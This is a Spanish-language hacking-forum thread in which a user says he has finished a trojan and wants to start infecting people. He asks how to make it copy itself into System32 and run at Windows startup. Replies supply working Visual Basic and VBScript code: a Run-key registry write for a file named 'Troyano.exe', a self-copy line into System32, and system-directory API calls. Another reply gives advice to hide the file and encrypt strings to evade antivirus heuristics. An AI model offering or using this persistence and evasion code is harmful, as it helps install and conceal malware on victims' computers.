 Autor
|
Tema: copiar a system o system 32 (Leído 12,212 veces)
|
vivachapas
 Desconectado
Mensajes: 612
|
bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....
alguno sabe como hacerlo?? desde ya muchas gracias
|
|
|
|
|
En línea
|
|
|
|
Jareth
Desconectado
Mensajes: 334
|
Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear.
Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta: usamos: txtClave txtExe LabelInfo Private mReg As cQueryReg
Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
Dim s As String
'
s = mReg.GetRegString(cvRun, txtClave.Text)
If s <> "" Then
LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s
Else
If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then
LabelInfo.Caption = "La clave se ha asignado correctamente."
Else
LabelInfo.Caption = "ERROR al crear la clave."
End If
End If no lo probe al codigo espero q ande... jeje no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho  les dejo el link de donde saque la info http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm |
|
|
|
« Última modificación: 2 Mayo 2007, 00:55 am por vivachapas »
|
En línea
|
|
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
s = mReg.GetRegString(cvRun, txtClave.Text) no entiendo q tengo q poner en el txtClave??
|
|
|
|
|
En línea
|
|
|
|
Jareth
Desconectado
Mensajes: 334
|
dim clave as object
set clave=CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"
y para copiarse: Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe"
Bueno ahi lo tienes. Saludos.
|
|
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
muchas gracias..! ya lo pruebo |
|
|
|
|
En línea
|
|
|
|
|
Hendrix
|
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado: <HD>:\<carpeta de Windows>\System32 Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttrTambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32). Un Saludo. |
|
|
|
|
En línea
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián |
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.006
|
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory En un modulo: Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Formulario: Private Sub Form_Load()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
Dim win
Dim sys
Longitud = 128
Es = GetWindowsDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
win = Camino
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
sys = Camino
End Sub Un saludo
|
|
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32). me podrias decir como lo cifro las cadenas?? Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Utilidad proceso SYSTEM
Windows
|
crazykenny
|
8
|
6,334
|
27 Abril 2011, 23:10 pm
por Randomize
|
|
|
|
System.Xml.Linq y System.Core
« 1 2 »
.NET (C#, VB.NET, ASP)
|
SγиtαxEяяoя
|
10
|
7,130
|
23 Junio 2013, 23:50 pm
por Eleкtro
|
|
|
|
[PC]System Shock (2020)
Juegos y Consolas
|
luiti
|
0
|
1,617
|
26 Septiembre 2020, 17:54 pm
por luiti
|
|
|
|
System.Net métodos
.NET (C#, VB.NET, ASP)
|
Beginner Web
|
0
|
1,767
|
6 Noviembre 2020, 23:33 pm
por Beginner Web
|
|
|
|
System Informer
Software
|
B€T€B€
|
1
|
3,470
|
13 Marzo 2023, 02:11 am
por ThunderCls
|
 |
